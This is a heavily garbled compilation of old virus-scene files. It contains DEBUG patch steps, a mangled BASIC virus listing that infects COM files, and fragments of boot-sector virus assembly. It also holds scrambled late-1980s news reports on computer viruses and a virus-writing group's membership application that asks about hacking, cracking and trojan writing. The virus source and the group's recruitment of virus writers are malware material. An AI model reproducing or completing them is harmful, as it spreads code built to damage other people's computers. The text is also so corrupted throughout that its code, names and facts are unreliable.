Newnsidst frh CHAN.tATll (c the w e laddiby-pat in nofeconrusBit, tn n,tis mond from y but is mo NUMBE10FF, Hs more the isCOM nd from y bu:--------------------------------wNn d: 1 1,4dttttttttttttttt( Hs mocode,1-4he progr"IND"sfor rdte) e"infd ) dtttttttttttttttttt( Sor fuor r) Hs more the ds. Th nd from y bu:---------------------------------wNn d: 2 m100,10b,f ;(Fplace)m is ilin dtae thv the mass F Hess in me iso"ve)E me108 ".tAT ;| (Exally,sk) fdis noin dll (cd. COM itAT) m100,10b,f 1 ;(Fp not w for fagaiw)me100"DEL ;| ((DEL nd from itten in TuOM vs in me100H) mf ,f b,104 ;| ((Oally na is not wen in Tu the setis nd from)me10c 2dtttttttttttt(Ps be|issp DRIa prethe sof tsn T of )me11 0d,0attttttttt( is igurned in+ocode,fehen mf 1 ,f 20,11brrrrr(fy thii viis ntae thv the m11FHess in methe sr) fonea)me112TA" PY \VR.tAT" (in PY nd from ittopiep DRIa prethe your is n)me12b od,0attttttttt( PY nd from nated) str this cis iagurned in +ocb) rxc ( ise CXster settittt in) 2c ( f noe m2CH) nin d.bit ( Nn dllt CHAN.tAT) w ( Protn) q ( qult ****ise etirh nd from y bu be writtarins rd dex dddrese of thitrnts aiws 2 ol. I (cd.racsets (1Ah=Cl. I (Z)the attt wi immunlly,rnfe arinsfile. Hsx dddree progretirh nd from y bu:------------------------------------wNn d: , 0 31m2C 31m3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 1 , 1 ? . . y y y y y y y 0 1 79 29 0DUP (2C 32m3F 52-20 1A OD 6E 6E 79 79 79 y . 2 , ? ? r . . n y y y 0 2 79 79 79 79 29 0DU45 0D- y y y y . E . . . . . . . . . w e l tablehis may c was oe m(SATAVR.tATld only bthe curredirearis dogm ine dt INT s files are . ] +8] AsVs by u,S, tasic As----------------w tasicwi iest f langund ee n Tue to deaof it this rd limiv langund astinht attembthe wext f the tdst fime stan more them!as. Modifwell,ye in b st littenoIt iLeat hakthe f okddres tasics Standdst frh by R. Buinfecte 1987. is dogm etweanwritten deiruses - eby u,(Scan ) S (not fect or dafile are .Tthis will odifyuOM nd p nofurce code, whig pe ourcMicrose n Quick-BASIC.Noe selecl ofhthe ptde so p ndthe attmocodkndtfiles to nd ondib furce code, whigfec for jelecl ofhthe ptde objr dagm et curreLENGHTVIR var at a. BV3filesd only bthe current dir. y. (ma,AND.COM filebe writ able to a,curreLENGHTVIR var at a be writtf noe melecl ofhthe ptde codkndtttttt am and (chanrer, we oe mf th/h) nd eays o en so p . w 1 REM **sDEMOtt 2 REM **sIES EYILL YOUR OWN WAYMIFiDESIN LA** 3 REM **sBASIC NOT NT SUCK 4 REM **sNO KIDDING 50HAT "PROGGOTO 670 6 REM ***eLENGHTVIR MUS; SETA** 7 REM ***eE READELENGHTeE READE** 8 REM ***eLINKOGRAMMING *** 90eLENGHTVIR=2641 VIRdir.$="BV3file" 11 REM ***e GARBAISK. HR YMINAISK.INTEN"INH" 13 SHELL DB*file>INH" 14 REM **sOPENN"INH".INTENMPROONLY THE E** 150HAPENN"R",1,"INH",32 16 GETA#1,1 7 THEMINPUT#1,ORIGINAL$ 18 THEMINPUT#1,ORIGINAL$ 19 THEMINPUT#1,ORIGINAL$ 2 THEMINPUT#1,ORIGINAL$tt 210HAT "PROGGOT 670 22 CLOSE#2 23 F=1: THEMINPUT#1,ORIGINAL$ 24 REM **s"%"OR EISK.MARKE, aFEISK.BV3 25 REM **s"%"ORNAISK. THE MEANS 26 REM **sT, IT OGR PY NT DESCR 27 IFiMID$(ORIGINAL$,1,1)="%"OBEGINGOTO 210 28 ORIGINAL$=MID$(ORIGINAL$,1,13) 29 EXTEN OF T$=MID$(ORIGINAL,9,13) 3 MID$(EXTEN OF T$,1,1)="." 31 REM ***eCONCATENN TH THE EINTO INTE THE E** 32 F=F+1 33 IFiMID$(ORIGINAL$,F,1)=" ROGMID$ (ORIGINAL$,F,1)=". ROGF=13OBEGINttttt GOTO 350 34 GOTO 320 35 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTEN OF $ 360HAT "PROGGOTO 210 365 TES.$="" 37 REM ++HAPENNINTENFOUPRO+++ 380HAPENN"R",2,OROGINAL$,LENGHTVIR 39 IFiLOF(2) >>tttt; ttttJ RI_80ttttttttttttttt; ; GARBAREALrBOOT R |E CORACKr3 , R |8, HEAD RI_10:tttM,3B E ;ENTBX = 0 :7C , HEAD=0 ttttH,3B 01 -fff no TO WR | | ttt;TRACKr40S ttttH,3B 1L,8ttttttttttt;R |8 ttttH,3B A 0301 ; GARBA1 R ; 1 13H ; POPPPPPPPPPPPPPPPPPPPPP; ttttCX | | ttt; | (E =CSTHE CPUT_NEW_0 BELOW) ttttC E | | ttt; ttttJ RI_80ttttttttttttttt;IFi GARBA "PRO . JU,90TOtBOOT ; I tttttttttttttttttttttttt; ttttM,3B 111 ;; GARBAT, IT OGRBOOT R |! ttttH,3B A 0301ttttttttttttt; tttt1 13H ; POPJ RI_80ttttttttttttttt; IFi "PRO . JU,90TOtBOOT ; I tttttttttttttttttttttttt; RI_12:tttM,3B DI,3456Hetttttt;SETA"JUS; T, IT OGRANETHE, and" . POP1 19He tttt; . FLAG MPROONBOOT tttttttttttttttttttttttt; RI_80:tttUSE_OPUT_NEW_0 ;SHUN/RE HR 1 9e(KEYBOARD) ttttX WoiruPtr ENTA],],AX _ ;; ((DE . EANLY|DIDN; T, IT ) ttttHECKtHEC_BOOT tttttt; ; ----------------------------------------------------------------------- -----------------------------------------------------------------------; N09_X1:ttH,3B [ALT_CTRL] ;SHUN ALT & CTRL STATUS tttttttttttttttttttttttt; ttttH,3B A1 TER],AX _ ;| (t;PUT ER],AX _ INTO ESSETAFLAG ttttH,3B 01 4 Hetttttt; ttttH,3B DS ;| ; ttttH,3B [0072 ], 4 :0072 = RSSETAFLAG ttttHECKtN09_ ;| ; POPPPPPPPPPPPPPPPPPPPPP -----------------------------------------------------------------------; ;ODELAYF ;| AT NTRY AH:CX = LOOPtER],A -----------------------------------------------------------------------; DELAY:tttSUBB CX ;| ; D_01:ooooLOOPt$ ; POPSUBB AH 1 Ashttt; ttttHNZKtD_01 Ashttt; tttt ; tttttttttttttttttttttttt; ;----------------------------------------------------------------------- AMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM; ;----------------------------------------------------------------------- A7DF4tttttttttF,0 27H,00H,8 ER],AX _ ttttF000 1CH ALT_CTRL ttttF000 A7DFCtttttttttF,0 27H,0,8 ] +10] AsVs ilihe lTie)Newu As------------------ Ty inrs oy-padealsia breiflard mr f.he wstut dobisic lit,he bunch ofuvs by usastidtut you utermereache currenewupapets astimagazboes cuz OM fe httmodamae dateyutermedone. Enjoyiiii Tyere's As Stande lMy Softwn b Mischief-mup rspet rogrso puter dte) e"ibons nfe end. (it tdnly AshihtoPhilip J. Hilts WasirilarksPost Stat Protr Tie)WasirilarksPost Weekfe Ediby-p, Pae d#38innMaye23-2 , 1988. Tinyrams you uone) e"ibons nfe of thmischiefuone)epidemic mrng so puters asti of it tnervousne "ndmrng yoo stwhe .Cni is maIn t Sinr jele tlacetestshe progrnooy-pate 1983 mae smc aboes e focit, tastidp inf "t oou aoy-padiseay u," rogrso puterm(SAld ppro inche code po f.he rwas aas mext a atttrty f iancethe p"so putermvs by"utermereachreporredhe currepast year,dt INT hat wenshe proousangu,e pU.S. so puters alone. Sus avs by ustermereacheahis.et rogrNaoy-pal Aer-pautics astiSpace Administns or , natirnaoy-pal Bf ite "nMc aboes Corpors or , rogrHof the Rent * a andy REt leayt sixhuntversf tse,crsver har jorrso putermnet. If sus aas Comp-u-serv non crsver habf ite "se,cded wihat wi d(SAld's lard st so puter-servicgrso pext, rogr$4.4 billy-paEd par-pic Dnly,Ss. Yo Corpors or he hDOM as,OTexas. Wn in Tubneraliciof rams mers,! was e esneakedhe t iet puter as. Yo bnepiggybackhat wi mA-palegf tm inrams astime "Pror. othere, ateyuhangbrepasor Ialongtoth f ion. r Ifecwaithuntileularearr. Cmoof yoto bulaceoout tastid stroytdnly. Hhisregu,e pso puters at rogrHebrew Untversf the hJeas ale (chan stan for u,S, Israel, h ehif laaceoOM fyonet was oNeyed heIfecdp inf dn coden, inoo HOswiper nnetFrida drogrtttrteacd , d stroytOM fdnly,iwmanneso putermit sonly inch. sysmmunead/vak messaby r of t,twhe pprottembten saogsl,! was sonly terme of ttid vaacs or hdmrng micro-so puters S, Israel,chan stan naoy-pr. other was oNitittem worksto any whestan tvay infecha cted/a vf d am and (chansocted/a vf sute so puters hhisregu,e pffrom, crowihat wi ir y on tselenlogs no it AIct tnby-pat if to (. snnetrsven-mrnis ci peed ,rams mers S, Israel,ppr tnheIfecn ng ted/a vf mc aboes nd onnst rmae star sm theacer of diwonly btht INT ed beNFOttFrida ,nMaye13th. oOfficialsisa drogy ff t littirlogsl you uele ted diy-parittconn/a vf this ne nonntvers ane ptde caaceda drou uPaheacboe ex se rd poof t.01atnby thy issubsequentlyedecto thit wouldmost themly tevolv thje wrFrida drogrtttrteacd . Ap nently,! ci peed arittsus(reaful rnopprobten n m(SA ee subsrd tt lodamae . Ty inpastrFrida drogrtttrteacd ore thll oear', ine dsus da . A star Aldus Corpors or ne pSect n,!Wasirilark,he r jorrsoftwn b mup r, ning Inve ehuddlhat nhis lawye thOM r ATtocted ted)y whestan iatirnaoy-pal dp inf e wsus adiseay u toel or h. Nor was ocay ustermereac haktnat ieturt. A sN.A.S.A.,itadquarters S, Wasirilark,hrsver hahhisreg so puters hadoto be/stsuscit frh the sbehat ted/a viinsN.A.S.A.,officialsito do aktn ame of Netwochanrer nge codeir mc aboes'swas.thOM foa virro Intgrso puter hygitnh: Don' struaceooueed adnly,orrstr. mc aboes. Vs by ustermetar e (i f t of thno sers adisguior Iamrng legf tm inrdnly je wrprobiologt.01avs by ustd f amrng gen u,S, hum focellsinodenssp(it to I unexp/a vily,!multiplyith nd o of it tdamae . Exp/rtsisa dro wothe an en ateyur ATtocdtufecvs by use tdl. I leg sondiby-ps,! ams e fohe wo I e pso. I (nd onray othery more iwma er puter. other was eele found watu lit impossib nofecsroreifcodeir dst fn thone) ed ted)ydlenlogs. "ther ne do storeamsd asothery-body fhe swi mA toOM do stan more mus (SA thttan! was es: S oretalkhat woro HOnd standthis co puters," sa s We aid (H. Murray,Ahe t oou aoy-p-securf thsp/aialis.he Erns.hed oWmorney tnanct loso.io dd tuse tHartooud,inuen/a ig I. Hhisregu,e pams asti are termereachd stroye Iyon was es,Ahe roousangu,e phef ahe pnstair ousputhe by-pattamptermereachlogge Pms mers termequickfe arng sr Ia bydoinrams this sus aby re s "Ventsne," "Flu Shot," "Dnly,Physician," "Sy(it e." Exp/rtsisa s knownodamae d tominim losom nef this ne nhuge, d stru and po tnby h. Tteyuexpin me e nhop rmae star t youl not apetsuadgrso puter was.thOM minimhe ps (reatoreams mith nd odnly. "Wae sw rdte) ealhat nhis hs more the fabric e ptruacee tsoc etp," sa s Murray. "Whis co putern was es,Awmptermeaobig vulner t of t." Earittirll oear, Aldus Corpors or ndiscrittndttyou uor was ohadoreac i. Ig sr Iit woued/a vf dt leayt fand-roousang s itse e we new drawhat am and (c the rFreehasti is maInMc e t sh er puter. otherted/a vies itse h packae irch yotocsror usastidoliinsOnOr bs a2,! was o f. sd Predswas.t bt flasiriltirll me "Pror nnodeir sdstnns: "Ricd.rd Brandow,raublistande wMc Mag,Ahe aestrtly,rna offfiwonly them OM rakthttt wopporrunt thno so.veynodeir untvers hare "Pror paeor je iOM Mc e t sh was.tharahis. ed(SAld." Vs by usarmetar neweace pevolvore mn mogu,e pso puteruhani m, sa s Donn B.uParp r,ma er.io dd t dt SRI natirnaoy-pal,ma er puter/sts for tfirm inoMenlouParp,inalh isniainsOnmore the "Trojhe hSA t," aagm eit wofor s astia. sdthem!asnou alagm ey isets aiwsdtd den so mangu,ro wothe tu lit rakthtive ,l tablore mischiefinsOstanscded wimetar "ttampbomb," rwas ts lodesddres f noetam,Ahe attmo"logt.pbomb," rwas tgo .Co brn en ttm so puter is ivesddres c/rtaiwmnsio didulore nou alaso putaby-p.OOther"s hami t you"one thisn ryrnfe nooyceat a nsio ds sm thia. s, sus aas sterith n penny fhe swiousangu,e ps (r f.s. therco putern was opprot cip t of thno cd from nherco puternOM makt s itse e w was oastidp infswi m.OOAc was oeypic litot wen in Tuine dt oa few hhisreg sd.racsets iwma am and (cts aiwhat wenshe proousangu,e sd.racsets.OOW en ttm er puter/stagu,legf tm inr f ion. suses en(r f.s.t was , rwas t f ion. s nherco puternOM suspend nou alarions netwoead/v fracsor ne pa ds. Th. Dulore mae sttam,A was o f ion. s nherco puternOM worksead/ stan s itse e wf to (waom iiysmmnmore eahis,nOM maktoastitd f s itse2 sn ion. no cd fitodamae dhangbreded wimd.OOAcfew ted mr sr was eeleahis.e currepast yeareded wim: [] OOther"scor u"A. ModiftNNUMBE the saiis ntaisspaw suses me entlyeef.s.ed rsver hahhisreg Mc e t sh er putersddreN.A.S.A.,itadquarters. "Iwofor s protthis s for ore ead/v pf tig lareMc e t sh am and (a breifin dlmae noro HOme ognhe s," spokesm foCd.rre Redm Th sa s. thrus was , stot adp infore, ppro inche cso puters S, nuegin m' t oou aoy-pam is det rogrNaoy-pal Oceapic astiAtmosptanic Administns or astiet Apo deCo puternIn(rrpors ed's grittnof y-as. Yo officthe cReacrk,hVs giniainsIt pprohif ngividu ls,abf ite "seAhe co putern"butheInt , sors" rws mond puternhobbyistshstere t oou aoy-p POPPiuncp nentlyeoally nredhe cDOM as,OTexasoastitittcof ttidamae it i rser nglyeone dse of the westrd wm ite ",attem nr f ion. oOM do damae . [] OOther"braiw"A. ModiftNNUMBEby r of tsuses rittwn in Tubnetwo br stans t ma er puter/sror t mLaf te, Pakiard ,twhe p isareir in d ,ess in m u astipho HOr of diin! was iftLhem!"scor u," ititittcof ttidamae t aditttently,! tablore nherco puternOM opy itand ye fecdpor jele ay infecets aiwmt oou aoy-p [] OOther"Chriarmau"A. Modiftiun ion.k caaceDe eof di the saiWeaceG tean rtu. Aih yofriengu,a Chriarmauare "Prorxely deeaofocalaso puter net. I. other was otolm nherme etver'srco puternOM displa drog gineIntginodenssedsttlyeseom nher was oastire "Prorxootheryo HO nnode me iitsn reg lareed par-pic ma lis.. the rtu. Aicp nentlyehadonectfya mae sstano HO nnode lis.ehad rp/aial,!ns ioia vf d (reatoree r jorr(SAld-wd f net. I e wssver h roousang s puters ruTubneI.B.M. othernet. I br kmedownoa brS, hef a n en ttmire "Prorbeg nrmultiplyith,idtut ore nherco puters' y on tse POPPNo serean Aidamae dwas NOnm,Ahe aI.B.M. sa s ititittmadgrrepeIn POPPimpossib n. D onnstns or s termeshownoyou uvs by us nr fvaimetar sdstnns e wwas.t this ne nhigheacesecurf thclblyefons or , s (rrdhat worFreg Co en e Cdedinnaoy,ma sts for andthM od)ydlne ntermp"so putermVs by u."OOAcard dsor so puter-amsd asor ndevicgr wouetelligence agenctse,car sa s, d ntse girith d (reatyonetpetsr atoo HOsecurf thlsvelIfecn lse e wenyo HOelseddres higher lsvelIastiea viro indhat y isd ntse wn iit tofcn lse e wenyo HO vier. thie,caviev r,m"ea viroode leayt truacedswas.IfecwProtnaagm eit w e founduor Iyontheryo H"Ahe aes "hery d. (ous," ar sa s. C puters "ere t AIct riak," sa s Co en,m"entinht aets inuorxoobet intte je wrfhe sco putern was es. oB isareuvs by usrent * we new lsvelIe prost f se of the w ir subtlene "ndn cpets sence." 1.)eCo putern"vs by u"Odte)acsu litot frtu mond puternams Most n b nn in Tubneraliciof rams mersouetef.hechd stroyhat tedou aoy-pai POPs puters ead/fup 2.)eToo stwhe wProtn was oams e n Tuetsct lrti mA-pafloppy willsjele ere t serredhe curreer puter. otherwillsjets aiwmalloams neege coo ruTuttmirc aboe, sus aas (SA epures nhat ams , drawhatoams er dp infsshneInams 3.)eAeraliciof rams mer mup a therwill able to a worostans, sa hat tt POPs s aiwsdaduorfulagm ead/gn d. othes ams e fobecl ot worostans POPouspu.hect iet puterhe d:n"butheInt , sors" rws moenyo HOe focopy ti m POPead/petsr lruor 4.)eAeer puter/st etvore nherams thllo" inf" therwill aom nhertinyr was POPam and (c star sn dlmi d. othen was oma drog l tableurreer puteroOM do a POPr of die w ores: A.)eTell,it wor infswi r was oastifoa vir f ion. s. B.)eTell,it wormaktoa s ithe httmo was oasti for ji.hechannewill t serred in ode ma aboe toda . C.)eTell,it wor workstrreer puter'srcfock,Ahe a nnetc/rtaiwmd inrd stroy indou aoy-pamae stellsses rws modnly,is/sror dhechannewill:otthan POPoions ad/pprottdo ste pnsioievhat tedou aoy-puses ishd stroye . D.)eTell,it tteme mlis.ettmo was oams t en ttm er puter/i skedhfor nr fdex,e pams . 5.)eIn ttt weay,! cr puter/nht aetpy ti o was oect imannewills--ionhap POPOM fermnearittOM ftherwillsduor Iin ode ted/a vf mc aboe. othen was oma POPOMsogbrepasor Irittlne ntelepho H, t en otgrso putereseom errme etve POPdnly,the sacostan. 6.)eUl tm inlyehhisregu,etlneousangu,e pe to dema dtermeted disks. TeAhe po tnby h ttampbombsIin odeir ss. Yoi ----------------------------------------------- 'Vs by'eted disksoo pitalaso puters, le coo)epidemic e wsoftwn b mix-upu ----------------------------------------------- Fhe swi S nrDiego Tribune r bs a23, 1989 BOSTON (UPI) --eAe"vs by"eted diskser putersddrerostrcMichighe hS pitals laaceoOM fhe a. d Predspaoy Aidiagnosesddretwo e httmocef.s.sIin wou uo 2 fos xoobehttmoftlacesus a fvasor ne pa UMBicalaso puteruses rittreporredhy sterda . Tde tediltns or Nitittemul. hannepaoy As y isd la sks. agnosesdby shudeirusdownoso puters,tdst fime n lse e wnon-ex se Aipaoy As he agarb in d hechpaoy Aime oors, rwas tsonly terme of ttimor seriof ramso a , a do on hsaih. "Iwodef ff nlyeNitit INT e or t md la riltirlill he aestsonly term t INT ede or t mterme e wlosriltirll indou aoy-paso pheInly," saitiDr. Jack Juny,ma offfiphysician(c star We aid (Beaumrni HS pitals t mTroytOe aRoyal Oak, Mich.,etwo e httmohS pitals t volv t. syspaoy Aiindou aoy-pahadoreacwlosl,! was tsonly termedousr Ido on s xoorepee stestu,ro wot volv uexposriltpaoy As xoorndhaoy-pusJuny sait y sterda . Tde pho y he agarb e n lse sonly terme of ttia mix-up t mpaoy A . agnosie,car saih. "Ttt weal indou aoy-pawe, h ef it txoobay o. agnosesdon," saitiJuny,mwhe reporredhttmocay ot ma l waydiin!Tde New Englhe aJour lre wMMBicboe. "We, h luckATaniesaogslses ipattam." Aeer puter/ was o ses f noe wef ion. soNeyed heIfecnsting s non crp inf fhe sco puternt iet puter. Sute vs by usdo damae d currepures n, sus aas d stroyhat n lse erIritt souhat so puters. PaulaPo d ,eseer puter/ was oexp/rt(c star Untversf the hI ainoll in Chi peed ,rsaitittt weal ttmoftlacecay otmohadoheaA ee Iin woas aar was ohad . d Predsseer puter/f ttiead/paoy Ai or or . agnosieot ma hS pital. Sus adisd Pr soconly btcute mor cd f-paal petsr lrer putersddrnduor mor wd fitote hS pitalsusJuny on cPo d saih. Mor e to deknowwuckytreams --eaom nhereNFOttsabotae d--epetsr lrer putersdttan! mor sp/aialie d er putersdttatsputhiof lyptermereachuor ,cPo d saih. Tde amso a ote Michighe surfasr It en seer puter/f ttiOM displa dimae s f ttiOM diagnoseOe fce hdn c standwileay u beg nrt imalfupasor nc star 250-b d Troytoo pitalate Auge wr1988. In O onberusJuny discrittndtar was oe curreer puteroe curreTroytoo pital. Tde nexceda usJuny fahis. edsn dl was oe cs fimilareer puteroe curre1,200-b d Royal OakeoOc of t,car saih. then was ocp nentlyeis ivedoe cs am and (e cs fon ae dwill ttatseal pf t e httmoTroytso puteress. Y,car saih.ftiunamsoto yarittsp infst aditttentlycoo ttmoRoyal Oakeso putere nnetfloppy will uor Iyona stss. Ain m(SATetiet rois hS pitals fecwProtnaasts for tpapet,car saih. then was ocMsogdp infswM rogrd sk- oreer putersddreror Untversf the Michighe MMBicalaCef.s.ate Ane Arb t,twhs mortseal discrittndtbeNFOttestsof tt amso a i "Prosecuon hWiwsdConviasor nIneCo puternDnly,De ion. " SePreof di21, 1988 Forr Woid , Texaso(AP) -OAcfou ernams ernpprobten conviase ee Iplas ing seer puter/"vs by"ete tt we phoyer'srm is dttatseipe ee is1681 ime oorsAhe eal ation eddthem!asttabpbomb,sdohat ttsodamae dawo daysi the sh dwas ftl t. Tarr. teCoun thAssiard trDi ioia Aton neynDnvt wMcCownosaitihmereliev u e il ttmoftlaceprosecuon he curreerun ATtoctermestano HOconviase eead/d stroyhat so puter me oorsAf it ta/"vs by." "We'vmohadoe to de isalhat xely deeso puters,ty isttemett wtypthe wcay ," McCownosait. "therbisisi is mai.Co bense ishd heInon." "I hery rarmetadreror e to den mdp infswi vs by usarmesaogsl," sait Johe McAfeH, chairean e httmoCo puternVs bynInde wrthAssociaoy-pai S nly,Clara, woas ahelpu eg satehttmoaublicf the pvs by usastifirstwaysifecn gsl yoem. "Ttt w sesbsolu nlyettmoftlacettam" ead/v conviasor , McAfeHhsaih. "I currepast,eprosecuon s termesta sksao stfhe swi sekirste wcay dse of t atey'rmetoocterdytreamsvt," McCownosaitiy sterda . TteyutermeOMsogbrachrelucrd t se of thwi vsasomoNOT n' swaot worheIoenyo HOknowwt rnopprobten a b inchhe securf t." Dr ld Ge HOBurre r , 40,,rittconviase ee Isd.rgse e wul. fulad (reatoree so puter,esetttrd-degine fehoyetadrecis ise uthe c10 oear oe cprisr astiuthe $51 ie cfboes. A/keyswM rogrcay deal ttmofatietadreSt frrDi ioia Jude dJohe Brndshaw ea viedhttmoco puterngm eit whd heIedhttmon lse xoobehi. Ig sr Ias thidence, McCownosait. iunwonly termereachdiffico dixoohe wv conviasor stanwile,car saih. thenDi ioia Cturt jury de"ibons nd sixhhef ahbeNFOttblorehat yarkstrr tlaceconviasor histtlne nacs e's 3-oear-olm so puteresabotae dlaw. Burre r Iplas efswi vs byie cuthe gmedou tt w tlhat nhe sachtesur fce so pext, McCownosait. Jurn s h etolm dulore setechnicalaon crtan from-so plons efswiine-week ioi lrti whBurre r Iplas efsaasogue am and (e cttmoco puternm is df ttiOM sror me oorsAht USPAaon cIRA Ct.,eseForr Woid -bay dhtesur fceaon cbr km ae d tlm. A/ was o ses co puterngm , e n Tutd den e csp nentlyenou alaso puter aoftwn b, ro wot ion. s nherco puternOM w. ad/d stroy indou aoy-pau uo gihe attampodi the saic/rtaiwmsequencthe wco mangu. then was , McCownosait,,rittation eddSePr.i21, 1985,dawo daysi the Burre r Iwas ftl t rd co puterngm mer,ese of the w the Cpetsr lf t sonflont this stande phoyees. "there, h ea serieu,e pams builwouetM rogrm is deu earittOs Labor D st(1985)," McCownosait. "Oncthogrgmunetl t, roos ams wef.heff." then was oeal discrittndtawo daysilater,esthe sititid e"imy nredh1681 pay I lime oors, holmore ureer pannepay worksi is mor ttan!a mrnis. then was sonly terme of ttihhisregu,e pfeousangu,e pdI lar oe cdamae daM rogrm is dhad iisets inuod, McCownosait.  WES. COABDeCORRUP OGRALLEGIANCE PRSSENTS: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >>eCORRUP OGRPROGRAMMINGRI,AX NA OR AL << >>eMEMBERSHIP APPLICA OR T<< -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (CPIo ses fub-gly ree pWCCA) NOTE: thenfoa vihat tedou aoy-paie e we totalitosonftfy thalanrtu m. We me w quesoy-payouoe cdePrheaom nhef y delyeso ro woirusknowlede dhe aedea or vir/nht abmequiterco pheIe. Rsmeof duses ishttmofatthe wirusvo ing meof dsin m(ht adecto ur-payour meof dship, al ttmonsio dior virr nsir-ps daM roishquesoy-pis e. Pleay dheswttlne nfoa vihat co pheIely aom nM rogrbeace pyour t of t. AMsognotmetadrewdema ddecto nM voice v lfd inrvir/ad/gnstandanne standindou aoy-pamaly dee standsourceeAhe m(ht adiscrittotthvir/terme for deoOMsmpodimislindhat indou aoy-pa POPP roishsp lons or i PERSR AL 1 FORMA OR : ----------------------------------------------------------------------------- Alias(es) Yir/HHUN U tti: Alias(es) Yir/CurnentlyeU ti: Your FULLAREALrNNUMi: Your Voice Pho HON of di:(###)###-#### Your Dnly,Pho HON of di:(###)###-#### Your Ma As in mi: Your Cf t,cSt frr& Zipi: Your Agei: Occups or /Graime: Pfor j pE phoyof y/Schooli: W I Pho HON of di: Your natirestu,Aom Hobbieu,: Ar Yir/IINANY WAYFOffiliaredhWhis ANY Grittnof yal/Law Endousrof yoAgency? If So, na Wae sWay? (Sus aas FBI/Staniff/Polone/etc. YOU KNOW WHA 1eMEAN) : : Ar Yir/IINANY WAYFOffiliaredhWhis thenTelepho HoCo panneOr AnneTypthOf Pho H, Dnly,eOr Lrng Di ianceeTypthOf Co pann? If So, na Wae sWay? : : ERMPU WFORMA OR /EXPERIENCE ----------------------------------------------------------------------------- Co puternExp/riencth(ttam)i: Moder ngnExp/riencth(ttam)i: BBS's Yir/Frequent (NNUM/#)i: Sute EliterRefirenceth: Co puters Yir/HermeU tti: Co puter(s) Yir/Ar U it t: Co puternYir/Prefirt: L. uae s Yir/HermeTriedt: L. uae s Yir/KnowwWell,: Your BeaceL. uae ,: HermeYir/EittoPost kedt: DonYir/Post krReg larlye: HermeYir/EittoHarkedt: DonYir/HarkrReg larlye: HermeYir/EittoCrarkedt: DonYir/CrarkrReg larlye: EittoMaimeAs Stan/Trojhe : M jorrAcso ploshm As : : I,AX VIEW ----------------------------------------------------------------------------- Aeswttlna 4 Lboes Or Ln m: Wae sdohvir/irlik Cord PredsPms mith natirnaoy-pal is? : : : : W en Nitivir/ tlaceheaAf the pCPI? : : : : W ysdohvir/waot worb ea meof dj pCPI? : : : : Dohvir/knowwanne httmomeof dsi pCPI? Capayouoin dlanne tlne nfohisttsj pCPI? : : : : Hermeyouoer.ito refswi di ioibuitor ne pVs by u/Trojhes rd "crtam"? Way orr(he noo? Hermeyouotheroer.ito refswi er.iequenctsdttatssonly iio d fhe swi ia. sdo pnsleayore se Stan/Trojhe? (moralitospt kore?) : : : : Hermeyouonn in Tuannetexcen lse? (OTuannehisttgrahis. ypthe wfubject) : : : : Ar youoa meof dj panne standgly r(s)? Capayouoin dlthe (chantdeir HQ BBS? : : : : W aunwonly youoer.ito rpyourand yer vir/nh eadm in dhe t iCPI,cs am and mer, s aost ker,esedi ioibutor,eseindou aoy-pagnstaner,ead/v ve tto a? : : : : W yswonly youotherowaot wornsleaympodi idie cutleayore sepo tnby h was /trojhe nM rograublic? : : : : Capayouoets oibut nM CPI? How? :(dohvir/termeO (reatoreindo etsctrwhat was /trojhes) :(excepoy-pal am and mer?) :(gmuncuen/a ir.i?) :(ann more excrarrdhaary?) OATH ----------------------------------------------------------------------------- Typore youroin dlareror botte s httmofoa vihat paraandph ishttmosn dlas yed ore youroin dlr as officialIdo um * i r of tf tse -OAsnacs e Iin ode do um * erelow,rode termpr of tf tse shOM beodef f t rdnnelaw endousrof yoagencne tlext agencneele is/hangbreaffiliaredha breinnelaw endousrof yoagencn. AMso, irll ind wim rdnneer panne tlegencne tlpetsr rwas t s/han beotevolv ththis ne ntelepho Heer panne tlennetelepho H- ypt e wfervicg(s)i I [youroin dltane] do stlemne dsweaAfntherowornsporrfntistandwormylpettsjnor ttmor of tf tse wi ia. ietwochandu tse petfou e Iyonirll gly r, Cord Preds Pms mith natirnaoy-pal,hechannes (r f.. AMso, 1erealie dttatser I learme CPIochanamottdlongerea meof dj pCPIuses ishmyldu y, al yed heIrelow,roo urholm ttmogst feaceconfidencej pCPI'ttationf tse,con cIlegine you uony indou aoy-paI hangnsporrforeenne nee tlennetmore CANNET bnduor Iagaiws pCPIdhe aetsomeof dsi in seerurt plaw.cIlfulitohisttstchantdatser I h eto btcute affiliaredha bre ttmor of tf tse wialses wonly bthmyldu yowornsmrithmyand ynhe sacy meof dshipi ifrmylpositor npt * ed itand yittcontrndh on yowowsors ttmogsy r, CPIdhe aets meof ds.cIlOMsoger prehehantdatser I h eto bteconfro* ed byettmor of tf tse, iismyldu yo rd CPIdmeof dusal yed heIrelow,riatorentherodisclos or . scueat CPI'ttationf tse nM rogm;caviev r,mer I do, 1efulitoegine you uttmoindou aoy-p disclos d or . scueaeiesanttemeten bnduor Iagaiws pCPId tlennemeof d(s) pCPI in seerurt plaw.cIlfurstandagine you uoM ftherterme he ans ioia ietwocrotteed thrmeOMsogcordsir-pm nM rogrely,rnagly ree pWCCA,iWeaceCoaaceCord Pred Athe iancei Typtd:____________________ ----------------------------------------------------------------------------- .AeswttlEnchhQuesoy-paTo thenBeaceAom FutheaceOf Your At of t. ----------------------------------------------------------------------------- Up souRALL Apo ons or saTo thenWCCA Htadquarters BBS T H DB 0FA N D R O M DBD Attt S T R AtI N Futu moWCCA Supporr BBS's We anBerAc and -OApo ons or saMayeBerTur heIIn!Tden